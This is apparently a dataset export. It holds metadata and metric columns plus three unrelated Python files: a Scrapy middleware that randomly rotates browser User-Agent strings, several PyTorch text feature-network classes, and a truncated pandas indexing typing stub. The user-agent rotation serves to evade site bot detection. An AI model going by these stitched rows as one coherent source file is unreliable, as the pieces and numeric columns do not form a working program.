| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d1021c32729a7a9fa5c037ceb56f6ed74e064c5
| 3,974
|
py
|
Python
|
supports/proxyPool/scrapy/RandomUserAgentMiddleware.py
|
LuckyNicky/pycrawler
|
4b3fe2f6e8e51f236d95a64a89a44199e4e97743
|
[
"Apache-2.0"
] | 1
|
2020-04-02T17:03:39.000Z
|
2020-04-02T17:03:39.000Z
|
supports/proxyPool/scrapy/RandomUserAgentMiddleware.py
|
LuckyNicky/pycrawler
|
4b3fe2f6e8e51f236d95a64a89a44199e4e97743
|
[
"Apache-2.0"
] | null | null | null |
supports/proxyPool/scrapy/RandomUserAgentMiddleware.py
|
LuckyNicky/pycrawler
|
4b3fe2f6e8e51f236d95a64a89a44199e4e97743
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
import random
"""
随机更换 User-agent 的中间件
@Author monkey
@Date 2017-12-16
"""
class RandomUserAgentMiddleware(object):
UserAgent_List = [
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0",
"Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0",
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00"
]
"""动态随机设置 User-agent"""
def process_request(self, request, spider):
ua = random.choice(self.UserAgent_List)
if ua:
request.headers.setdefault('User-Agent', ua)
request.headers.setdefault('Referer', request.url)
# print(request.headers)
| 68.517241
| 130
| 0.660795
| 709
| 3,974
| 3.686883
| 0.174894
| 0.082249
| 0.10329
| 0.176741
| 0.761285
| 0.731064
| 0.707728
| 0.690513
| 0.656465
| 0.603673
| 0
| 0.227148
| 0.1769
| 3,974
| 57
| 131
| 69.719298
| 0.571996
| 0.014092
| 0
| 0.047619
| 0
| 0.785714
| 0.811912
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.02381
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d467aee6e6d0847d50d877cd5e31e2b59ed6f9c
| 13,206
|
py
|
Python
|
kme/models/text_featurenets.py
|
phineasng/FLAN
|
84c0fb7ea57d5730eb19fdaa25d705a4ec7490c9
|
[
"Apache-2.0"
] | null | null | null |
kme/models/text_featurenets.py
|
phineasng/FLAN
|
84c0fb7ea57d5730eb19fdaa25d705a4ec7490c9
|
[
"Apache-2.0"
] | null | null | null |
kme/models/text_featurenets.py
|
phineasng/FLAN
|
84c0fb7ea57d5730eb19fdaa25d705a4ec7490c9
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
from kme.models.base import create_sinusoidal_positional_embeddings
from kme.data.text_classification import PAD_TOKEN
from kme.models.base import FeatureNetBase
class TextFeatNet1(FeatureNetBase):
"""
Basic text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet1, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len, self._latent_dim).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._emb_dim, 1024),
nn.LeakyReLU(),
nn.Linear(1024, 2048),
nn.LeakyReLU(),
nn.Linear(2048, 512),
nn.LeakyReLU(),
nn.Linear(512, self._latent_dim),
nn.LeakyReLU(),
)
def process_samples(self, s):
s = self._embeddings(s)
s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
return s
class TextFeatNet2(FeatureNetBase):
"""
Basic text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet2, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len, self._latent_dim).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._emb_dim, 2048),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
nn.Linear(2048, 512),
nn.LeakyReLU(),
nn.Linear(512, self._latent_dim),
nn.LeakyReLU(),
)
def process_samples(self, s):
s = self._embeddings(s)
s = self._feature_encoder(s) + (self._pos_embeddings.to(s.device))
return s
class TextFeatNet3(FeatureNetBase):
"""
Basic text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet3, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len, 2048).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._emb_dim, 2048),
nn.LeakyReLU()
)
self._feature_encoder_2 = nn.Sequential(
nn.Linear(2048, 1024),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
nn.Linear(1024, self._latent_dim),
nn.LeakyReLU(),
)
def process_samples(self, s):
s = self._embeddings(s)
s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
s = self._feature_encoder_2(s)
return s
class TextFeatNet4(FeatureNetBase):
"""
Basic text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet4, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len, 2048).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._emb_dim, 2048),
nn.Dropout(p=0.2),
nn.LeakyReLU()
)
self._feature_encoder_2 = nn.Sequential(
nn.Linear(2048, self._latent_dim),
nn.Dropout(p=0.2),
nn.LeakyReLU(),
)
def process_samples(self, s):
mask = (s != self._vocab.stoi[PAD_TOKEN])
s = self._embeddings(s)
s = (s.transpose(1, 2).transpose(0, 1) *
mask).transpose(0, 1).transpose(1, 2)
s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
s = self._feature_encoder_2(s)
return s
class TextFeatNet5(FeatureNetBase):
"""
Basic text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet5, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len, latent_dim).to(device)
self._feature_encoder = nn.Linear(
self._emb_dim, latent_dim, bias=False)
def process_samples(self, s):
mask = (s != self._vocab.stoi[PAD_TOKEN])
s = self._embeddings(s)
s = (s.transpose(1, 2).transpose(0, 1) *
mask).transpose(0, 1).transpose(1, 2)
s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
return s
class TextFeatNet6(FeatureNetBase):
"""
Basic text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet6, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len, 2048).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._emb_dim, 2048, bias=False),
nn.Dropout(p=0.2)
)
self._feature_encoder_2 = nn.Sequential(
nn.Linear(2048, self._latent_dim),
nn.Dropout(p=0.2),
nn.LeakyReLU(),
)
def process_samples(self, s):
mask = (s != self._vocab.stoi[PAD_TOKEN])
s = self._embeddings(s)
s = (s.transpose(1, 2).transpose(0, 1) *
mask).transpose(0, 1).transpose(1, 2)
s = self._feature_encoder(s)*(self._pos_embeddings.to(s.device))
s = self._feature_encoder_2(s)
return s
class TextFeatNet7(FeatureNetBase):
"""
CNN text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet7, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._stride = 5
self._pos_dim = 1024
self._conv = nn.Sequential(
nn.Conv1d(self._emb_dim, self._emb_dim,
kernel_size=self._stride, stride=self._stride),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
nn.Conv1d(self._emb_dim, self._pos_dim, kernel_size=1, stride=1),
nn.LeakyReLU(),
)
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len // self._stride, self._pos_dim).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._pos_dim, self._latent_dim),
nn.Dropout(p=0.2),
nn.LeakyReLU(),
)
def process_samples(self, s):
s = self._embeddings(s)
# s : B x MAX_LEN x emb_dim
s = s.transpose(1, 2)
# S : B x emb_dim x MAX_LEN
s = self._conv(s)
# s : B x pos_dim x (MAX_LEN//5)
s = s.transpose(1, 2)
# s : B x (MAX_LEN//5) x pos_dim
s = s*(self._pos_embeddings.to(s.device))
s = self._feature_encoder(s)
# s : B x (MAX_LEN//5) x latent_dim
return s
class TextFeatNet8(FeatureNetBase):
"""
CNN text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet8, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._stride = 5
self._pos_dim = 32
self._conv = nn.Sequential(
nn.Conv1d(self._emb_dim, self._emb_dim,
kernel_size=self._stride, stride=self._stride),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
nn.Conv1d(self._emb_dim, self._pos_dim, kernel_size=1, stride=1),
nn.LeakyReLU(),
)
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len // self._stride, self._pos_dim).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._pos_dim, self._latent_dim),
nn.Dropout(p=0.2),
nn.LeakyReLU(),
)
def process_samples(self, s):
s = self._embeddings(s)
# s : B x MAX_LEN x emb_dim
s = s.transpose(1, 2)
# S : B x emb_dim x MAX_LEN
s = self._conv(s)
# s : B x pos_dim x (MAX_LEN//5)
s = s.transpose(1, 2)
# s : B x (MAX_LEN//5) x pos_dim
s = s*(self._pos_embeddings.to(s.device))
s = self._feature_encoder(s)
# s : B x (MAX_LEN//5) x latent_dim
return s
class TextFeatNet9(FeatureNetBase):
"""
CNN text feature network
"""
def __init__(self, emb_dim, latent_dim, vocabulary, max_sentence_len, device='cpu'):
super(TextFeatNet9, self).__init__()
self._emb_dim = emb_dim
self._latent_dim = latent_dim
self._vocab = vocabulary
self._vocab.stoi = self._vocab.get_stoi()
self._max_len = max_sentence_len
self._stride = 5
self._pos_dim = 32
self._conv = nn.Sequential(
nn.Conv1d(self._emb_dim, self._emb_dim,
kernel_size=self._stride, stride=self._stride),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
nn.Conv1d(self._emb_dim, self._emb_dim, kernel_size=1, stride=1),
nn.LeakyReLU(),
nn.Conv1d(self._emb_dim, self._emb_dim, kernel_size=1, stride=1),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
nn.Conv1d(self._emb_dim, self._emb_dim, kernel_size=1, stride=1),
nn.LeakyReLU(),
nn.Conv1d(self._emb_dim, self._pos_dim, kernel_size=1, stride=1),
nn.LeakyReLU(),
nn.Dropout(p=0.2),
)
self._embeddings = nn.Embedding(len(self._vocab), embedding_dim=self._emb_dim,
padding_idx=self._vocab.stoi[PAD_TOKEN])
self._pos_embeddings = create_sinusoidal_positional_embeddings(
self._max_len // self._stride, self._pos_dim).to(device)
self._feature_encoder = nn.Sequential(
nn.Linear(self._pos_dim, self._latent_dim),
nn.LeakyReLU(),
)
def process_samples(self, s):
s = self._embeddings(s)
# s : B x MAX_LEN x emb_dim
s = s.transpose(1, 2)
# S : B x emb_dim x MAX_LEN
s = self._conv(s)
# s : B x pos_dim x (MAX_LEN//5)
s = s.transpose(1, 2)
# s : B x (MAX_LEN//5) x pos_dim
s = s*(self._pos_embeddings.to(s.device))
# s : B x (MAX_LEN//5) x latent_dim
s = self._feature_encoder(s)
return s
| 34.752632
| 88
| 0.595184
| 1,686
| 13,206
| 4.297153
| 0.048043
| 0.052174
| 0.066253
| 0.034783
| 0.941891
| 0.929331
| 0.927674
| 0.926294
| 0.921187
| 0.912629
| 0
| 0.022146
| 0.292216
| 13,206
| 379
| 89
| 34.844327
| 0.752969
| 0.051567
| 0
| 0.826087
| 0
| 0
| 0.002182
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065217
| false
| 0
| 0.018116
| 0
| 0.148551
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
740f279d3f1d871db45a018bda605fa7b5d1c1d4
| 43,523
|
py
|
Python
|
data/typing/pandas.core.indexing.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.core.indexing.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
data/typing/pandas.core.indexing.py
|
vfdev-5/python-record-api
|
006faf0bba9cd4cb55fbacc13d2bbda365f5bf0b
|
[
"MIT"
] | null | null | null |
from typing import *
class IndexingError:
pass
class _LocIndexer:
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeNoLeap, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: Literal["0001"], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[Literal["0001-01-01"], Literal["0001-12-30"], Literal["0001-01-01"]],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, Literal["0001-12-30"], None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeNoLeap,
cftime._cftime.DatetimeNoLeap,
cftime._cftime.DatetimeNoLeap,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeNoLeap, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.Datetime360Day, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.Datetime360Day,
cftime._cftime.Datetime360Day,
cftime._cftime.Datetime360Day,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.Datetime360Day, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeJulian, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeJulian,
cftime._cftime.DatetimeJulian,
cftime._cftime.DatetimeJulian,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeJulian, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeAllLeap, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeAllLeap,
cftime._cftime.DatetimeAllLeap,
cftime._cftime.DatetimeAllLeap,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeAllLeap, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeGregorian, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeGregorian,
cftime._cftime.DatetimeGregorian,
cftime._cftime.DatetimeGregorian,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, cftime._cftime.DatetimeGregorian, None], /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: cftime._cftime.DatetimeProlepticGregorian, /):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
cftime._cftime.DatetimeProlepticGregorian,
cftime._cftime.DatetimeProlepticGregorian,
cftime._cftime.DatetimeProlepticGregorian,
],
/,
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self, _0: slice[None, cftime._cftime.DatetimeProlepticGregorian, None], /
):
"""
usage.xarray: 2
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["x", "a"]]], /
):
"""
usage.xarray: 1
"""
...
@overload
def __getitem__(self, _0: numpy.ndarray, /):
"""
usage.dask: 3
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: pandas.core.indexes.base.Index, /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, None, None], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: slice[None, int, None], /):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(self, _0: slice[Literal["E"], Literal["g"], Literal["E"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["h"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["f"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["j"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["k"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["b"], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[Literal["b"], Literal["f"], Literal["b"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["k"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["b"], Literal["d"], Literal["b"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["f"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["h"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["h"], Literal["k"], Literal["h"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["h"], Literal["j"], Literal["h"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["a"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["a"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["e"], Literal["f"], Literal["e"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["e"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[int, int, int], /):
"""
usage.dask: 16
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["f", "d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["g", "d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["g", "f", "d", "c"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["g", "f"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[int], /):
"""
usage.dask: 8
"""
...
@overload
def __getitem__(self, _0: slice[int, numpy.int64, int], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, numpy.int64, numpy.int64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, int, numpy.int64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: float, /):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["d"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["g"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.float64, float, numpy.float64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[float, numpy.float64, float], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[float, float, float], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: slice[
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["b"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["b"], Literal["g"], Literal["b"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["l"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["q"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["q"], Literal["v"], Literal["q"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["v"], Literal["z"], Literal["v"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[Literal["x"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[Literal["z", "y"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: slice[None, pandas._libs.tslibs.timestamps.Timestamp, None], /
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: slice[
pandas._libs.tslibs.timestamps.Timestamp,
None,
pandas._libs.tslibs.timestamps.Timestamp,
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, Literal["02.02.2015"], None], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self, _0: slice[Literal["02.02.2015"], None, Literal["02.02.2015"]], /
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[int, None, int], /):
"""
usage.dask: 5
"""
...
@overload
def __getitem__(self, _0: list, /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: pandas.core.series.Series, /):
"""
usage.dask: 5
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], slice[None, None, None]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[Callable, slice[None, None, None]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[pandas.core.series.Series, slice[None, None, None]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Callable], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["g"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["k"], Literal["o"], Literal["k"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["o"], Literal["t"], Literal["o"]], /):
"""
usage.dask: 1
"""
...
@overload
